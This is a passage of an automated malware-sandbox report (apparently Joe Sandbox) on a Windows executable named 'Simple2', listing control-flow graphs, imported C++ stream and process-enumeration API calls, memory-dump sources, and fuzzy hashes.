?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1191->1195 1196 7ff6876b9847 1192->1196 1197 7ff6876b981c 1192->1197 1193->1194 1199 7ff6876b98b1-7ff6876b98cb 1194->1199 1200 7ff6876b98aa-7ff6876b98b0 1194->1200 1202 7ff6876b97f3-7ff6876b97f8 1195->1202 1203 7ff6876b97fa-7ff6876b97fd 1195->1203 1201 7ff6876b984a 1196->1201 1198 7ff6876b9820-7ff6876b9823 1197->1198 1204 7ff6876b984e-7ff6876b985e 1198->1204 1205 7ff6876b9825-7ff6876b9840 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1198->1205 1200->1199 1201->1204 1202->1201 1203->1191 1204->1190 1205->1196 1206 7ff6876b9842-7ff6876b9845 1205->1206 1206->1198
            APIs
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6876B976A
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6876B978A
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6876B979A
            • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF6876B97E7
            • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6876B9811
            • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF6876B9836
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6876B987D
            • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6876B9884
            • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6876B9891
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
            • String ID:
            • API String ID: 3397294066-0
            • Opcode ID: f76aa2856fdbe99886ac723c8ffec56e959f383987e6da2831f890b10fbbf1f1
            • Instruction ID: 3243505e74483d5ba7abc065fbe22c33bd441f95e3fb150f3fbe7e5c1e96e08a
            • Opcode Fuzzy Hash: f76aa2856fdbe99886ac723c8ffec56e959f383987e6da2831f890b10fbbf1f1
            • Instruction Fuzzy Hash: E2513D36648A41C1EF208F1AE590239A7A0FF96F95B15C535EE4E877A1CF3DE486D300

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1208 7ff6876b94e0-7ff6876b9509 1209 7ff6876b9510-7ff6876b9517 1208->1209 1209->1209 1210 7ff6876b9519-7ff6876b9528 1209->1210 1211 7ff6876b9534 1210->1211 1212 7ff6876b952a-7ff6876b952d 1210->1212 1213 7ff6876b9536-7ff6876b9546 1211->1213 1212->1211 1214 7ff6876b952f-7ff6876b9532 1212->1214 1215 7ff6876b954f-7ff6876b9561 ?good@ios_base@std@@QEBA_NXZ 1213->1215 1216 7ff6876b9548-7ff6876b954e 1213->1216 1214->1213 1217 7ff6876b9593-7ff6876b9599 1215->1217 1218 7ff6876b9563-7ff6876b9572 1215->1218 1216->1215 1222 7ff6876b95a5-7ff6876b95b8 1217->1222 1223 7ff6876b959b-7ff6876b95a0 1217->1223 1220 7ff6876b9591 1218->1220 1221 7ff6876b9574-7ff6876b9577 1218->1221 1220->1217 1221->1220 1224 7ff6876b9579-7ff6876b958f ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1221->1224 1226 7ff6876b95eb-7ff6876b9606 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1222->1226 1227 7ff6876b95ba 1222->1227 1225 7ff6876b9655-7ff6876b9673 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1223->1225 1224->1217 1230 7ff6876b967f-7ff6876b968f 1225->1230 1231 7ff6876b9675-7ff6876b967e ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1225->1231 1228 7ff6876b962e 1226->1228 1229 7ff6876b9608-7ff6876b960b 1226->1229 1232 7ff6876b95c0-7ff6876b95c3 1227->1232 1235 7ff6876b9631 1228->1235 1233 7ff6876b9635-7ff6876b9645 1229->1233 1234 7ff6876b960d-7ff6876b9627 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1229->1234 1236 7ff6876b9691-7ff6876b9697 1230->1236 1237 7ff6876b9698-7ff6876b96ac 1230->1237 1231->1230 1232->1226 1238 7ff6876b95c5-7ff6876b95df ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1232->1238 1233->1225 1234->1228 1241 7ff6876b9629-7ff6876b962c 1234->1241 1235->1233 1236->1237 1239 7ff6876b95e1-7ff6876b95e4 1238->1239 1240 7ff6876b95e6-7ff6876b95e9 1238->1240 1239->1235 1240->1232 1241->1229
            APIs
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9559
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9579
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9589
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B95D6
            • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B95FD
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B961E
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9664
            • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B966B
            • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9678
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
            • String ID:
            • API String ID: 1135186806-0
            • Opcode ID: 4edaa17dd7ad51bee8b47bfb92d09c61649fc27c2f4a9316c88697547ac0acde
            • Instruction ID: 402f3e49252413ead9def058c920259af7a28c5e6cd8d10d15f5a4c0a4f1b0bc
            • Opcode Fuzzy Hash: 4edaa17dd7ad51bee8b47bfb92d09c61649fc27c2f4a9316c88697547ac0acde
            • Instruction Fuzzy Hash: 66513032689A41C1EF218F29E5D0238A7A0FF96F95B15C535EE5E877A1CF39E486D300

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1243 7ff6876bad00-7ff6876bad3a 1244 7ff6876bad46 1243->1244 1245 7ff6876bad3c-7ff6876bad3f 1243->1245 1247 7ff6876bad48-7ff6876bad58 1244->1247 1245->1244 1246 7ff6876bad41-7ff6876bad44 1245->1246 1246->1247 1248 7ff6876bad61-7ff6876bad73 ?good@ios_base@std@@QEBA_NXZ 1247->1248 1249 7ff6876bad5a-7ff6876bad60 1247->1249 1250 7ff6876bada5-7ff6876badab 1248->1250 1251 7ff6876bad75-7ff6876bad84 1248->1251 1249->1248 1255 7ff6876badb7-7ff6876badd0 1250->1255 1256 7ff6876badad-7ff6876badb2 1250->1256 1253 7ff6876bada3 1251->1253 1254 7ff6876bad86-7ff6876bad89 1251->1254 1253->1250 1254->1253 1260 7ff6876bad8b-7ff6876bada1 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1254->1260 1258 7ff6876bae04-7ff6876bae1f ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1255->1258 1259 7ff6876badd2-7ff6876badd5 1255->1259 1257 7ff6876bae6f-7ff6876bae8d ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1256->1257 1261 7ff6876bae8f-7ff6876bae98 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1257->1261 1262 7ff6876bae99-7ff6876baea8 1257->1262 1264 7ff6876bae21-7ff6876bae24 1258->1264 1265 7ff6876bae48-7ff6876bae4b 1258->1265 1259->1258 1263 7ff6876badd7-7ff6876badf2 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1259->1263 1260->1250 1261->1262 1268 7ff6876baeb1-7ff6876baecb 1262->1268 1269 7ff6876baeaa-7ff6876baeb0 1262->1269 1266 7ff6876badff-7ff6876bae02 1263->1266 1267 7ff6876badf4-7ff6876badfd 1263->1267 1270 7ff6876bae4f-7ff6876bae5f 1264->1270 1271 7ff6876bae26-7ff6876bae41 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1264->1271 1265->1270 1266->1259 1267->1264 1269->1268 1270->1257 1271->1265 1272 7ff6876bae43-7ff6876bae46 1271->1272 1272->1264
            APIs
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6876B1A49), ref: 00007FF6876BAD6B
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6876B1A49), ref: 00007FF6876BAD8B
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6876B1A49), ref: 00007FF6876BAD9B
            • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6876B1A49), ref: 00007FF6876BADE8
            • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6876B1A49), ref: 00007FF6876BAE16
            • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6876B1A49), ref: 00007FF6876BAE37
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6876B1A49), ref: 00007FF6876BAE7E
            • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6876B1A49), ref: 00007FF6876BAE85
            • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF6876B1A49), ref: 00007FF6876BAE92
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
            • String ID:
            • API String ID: 3397294066-0
            • Opcode ID: cb10e80f2af6a6ecea6bfc50fdf9e660d84334f5a54366d3bc9b5ef052e487fb
            • Instruction ID: ef6d6ac9bafe4e539ea73305a1a32eecd3aa22ac08d3abfcfadad1957f43a801
            • Opcode Fuzzy Hash: cb10e80f2af6a6ecea6bfc50fdf9e660d84334f5a54366d3bc9b5ef052e487fb
            • Instruction Fuzzy Hash: EC510F32648A41C1EF608F59E590239A7A1FF86F85B55843AEF4E87764CF3DE486E300

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1274 7ff6876b9310-7ff6876b934a 1275 7ff6876b9353-7ff6876b9365 ?good@ios_base@std@@QEBA_NXZ 1274->1275 1276 7ff6876b934c-7ff6876b9352 1274->1276 1277 7ff6876b9397-7ff6876b939d 1275->1277 1278 7ff6876b9367-7ff6876b9376 1275->1278 1276->1275 1282 7ff6876b93a3-7ff6876b93c9 1277->1282 1283 7ff6876b9472-7ff6876b94a0 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1277->1283 1280 7ff6876b9395 1278->1280 1281 7ff6876b9378-7ff6876b937b 1278->1281 1280->1277 1281->1280 1284 7ff6876b937d-7ff6876b9393 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1281->1284 1285 7ff6876b9409-7ff6876b9424 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1282->1285 1286 7ff6876b93cb 1282->1286 1287 7ff6876b94a2-7ff6876b94ab ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1283->1287 1288 7ff6876b94ac-7ff6876b94bb 1283->1288 1284->1277 1289 7ff6876b9427-7ff6876b942b 1285->1289 1292 7ff6876b93d0-7ff6876b93d5 1286->1292 1287->1288 1290 7ff6876b94c4-7ff6876b94d8 1288->1290 1291 7ff6876b94bd-7ff6876b94c3 1288->1291 1293 7ff6876b9430-7ff6876b9435 1289->1293 1291->1290 1292->1293 1294 7ff6876b93d7-7ff6876b93da 1292->1294 1295 7ff6876b9462 1293->1295 1296 7ff6876b9437-7ff6876b943a 1293->1296 1298 7ff6876b9406 1294->1298 1299 7ff6876b93dc-7ff6876b9404 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1294->1299 1295->1283 1296->1295 1300 7ff6876b943c-7ff6876b9460 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1296->1300 1298->1285 1299->1292 1300->1289
            APIs
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6876B935D
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6876B937D
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6876B938D
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6876B93ED
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6876B9416
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6876B944D
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6876B9491
            • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6876B9498
            • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6876B94A5
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: ?sputc@?$basic_streambuf@D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
            • String ID:
            • API String ID: 569342377-0
            • Opcode ID: 15a03189b274fb8324ea74e98fa5bbb580fa16b3cd8c430ff54d2bfccaf7f256
            • Instruction ID: dcc579e0498f73be6df608faf7d9db13c85652215aa0d57e5642b38f74eb5869
            • Opcode Fuzzy Hash: 15a03189b274fb8324ea74e98fa5bbb580fa16b3cd8c430ff54d2bfccaf7f256
            • Instruction Fuzzy Hash: D2514032649B81C6EF108F19D5D0238A7A0FF96B95B158536DE6E877A0CF38E49AD700

            Control-flow Graph

            APIs
            • memset.VCRUNTIME140(?,?,?), ref: 00007FF6876B3C8B
              • Part of subcall function 00007FF6876B6390: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B63CA
              • Part of subcall function 00007FF6876B6390: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6876B63E6
              • Part of subcall function 00007FF6876B6390: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B6418
            • K32EnumProcesses.KERNEL32(?,?,?), ref: 00007FF6876B3CA9
            • memset.VCRUNTIME140(?,?,?), ref: 00007FF6876B3D57
            • OpenProcess.KERNEL32(?,?,?), ref: 00007FF6876B3D66
            • K32EnumProcessModules.KERNEL32(?,?,?), ref: 00007FF6876B3D87
            • K32GetModuleBaseNameA.KERNEL32(?,?,?), ref: 00007FF6876B3DA6
            • CloseHandle.KERNELBASE(?,?,?), ref: 00007FF6876B3DCF
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?), ref: 00007FF6876B3E28
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?), ref: 00007FF6876B3E32
              • Part of subcall function 00007FF6876B9BB0: memcpy.VCRUNTIME140 ref: 00007FF6876B9BE8
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$EnumProcessmemset$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BaseCloseD@std@@@1@@HandleModuleModulesNameOpenProcessesV?$basic_streambuf@memcpy
            • String ID:
            • API String ID: 3444793848-0
            • Opcode ID: 001c237f97d5f8cac39dba6690658c1a24ce0538eeddbe328d7bd751e8db2459
            • Instruction ID: fcadda97dce69dba38c7c3905140e351e3c54d28c9e419fea15cdeb2a479c275
            • Opcode Fuzzy Hash: 001c237f97d5f8cac39dba6690658c1a24ce0538eeddbe328d7bd751e8db2459
            • Instruction Fuzzy Hash: E8514F32B58A86C6EF20CF21E8805E96761FF86B84F544039EA4D97B58DF3CE585DB00
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
            • String ID:
            • API String ID: 1133592946-0
            • Opcode ID: b36050c3393a8da228e922bd9e4049c9505ee04a9bc4197bf93d5a9783a52870
            • Instruction ID: 3e216c9892eb13be6dbc7e07af0e497365916d4d4c38fd332a91bff67ecdca68
            • Opcode Fuzzy Hash: b36050c3393a8da228e922bd9e4049c9505ee04a9bc4197bf93d5a9783a52870
            • Instruction Fuzzy Hash: 3B310B21A8C542C2EE14AB25A5523B92391BF97788F4C403DFA4DDB2D7DE6DB8C4E710
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 1775671525-0
            • Opcode ID: 59e7986ff7ea82e6e9f4663991bfe25bcf01b9bf419426c86748b00627e2fba1
            • Instruction ID: ce36e4837cd677c508414bcbf73d3141b7e867d107a1f4200d2a3aa6e14a7de1
            • Opcode Fuzzy Hash: 59e7986ff7ea82e6e9f4663991bfe25bcf01b9bf419426c86748b00627e2fba1
            • Instruction Fuzzy Hash: 2241F362B58642C1EE20DB12A50426A6751FF4ABD0F484639EE5D8BB86DE3CF0C5F300
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@_Yarn@malloc
            • String ID:
            • API String ID: 3292048638-0
            • Opcode ID: c5c58ce028b6ec0e5e802597466f4c5df5884475aab6afb233ffb8e2f821a7d5
            • Instruction ID: 3c4fda48877dfc7a2916d14ba20e31e9288c9d1961aea9b715fb30877010cf90
            • Opcode Fuzzy Hash: c5c58ce028b6ec0e5e802597466f4c5df5884475aab6afb233ffb8e2f821a7d5
            • Instruction Fuzzy Hash: 6341F936A99B42C1EE05CB11F8442797B64BF9AB85F154139EA8E87B21DF3CA0D9D340
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task
            • String ID:
            • API String ID: 118556049-0
            • Opcode ID: 8e35efa224ce1d8c90e95bf8cb906f129a4b3d71bf354b9504549117d8dbe710
            • Instruction ID: 1e9c154b50743ef5e0a6704d716b009ae8e5fe695da07c32c1df8fd011ebf4c8
            • Opcode Fuzzy Hash: 8e35efa224ce1d8c90e95bf8cb906f129a4b3d71bf354b9504549117d8dbe710
            • Instruction Fuzzy Hash: C2518D32A08B45C5EF158F29D45022C37A1FB49FA8F584136EE5D933A9EF38E481E340
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5273a414ad2a8e3638f51944160ccb7bf4edba53f1bf469c37612bc3a0f81b19
            • Instruction ID: 00000c54af0583fa0498a0862e81ea53a9f2d0e5d335fdc4ae5af4c4a08cd83a
            • Opcode Fuzzy Hash: 5273a414ad2a8e3638f51944160ccb7bf4edba53f1bf469c37612bc3a0f81b19
            • Instruction Fuzzy Hash: 99315C22744A82C6EE659F26E4043B9A760FF46B94F088039DF4D87B61DE3CF596D300
            APIs
            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6876B1079), ref: 00007FF6876BB1A2
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876BB1B8
              • Part of subcall function 00007FF6876BB924: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6876BB92D
              • Part of subcall function 00007FF6876BB924: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF6876BB1BD,?,?,?,00007FF6876B1079), ref: 00007FF6876BB93E
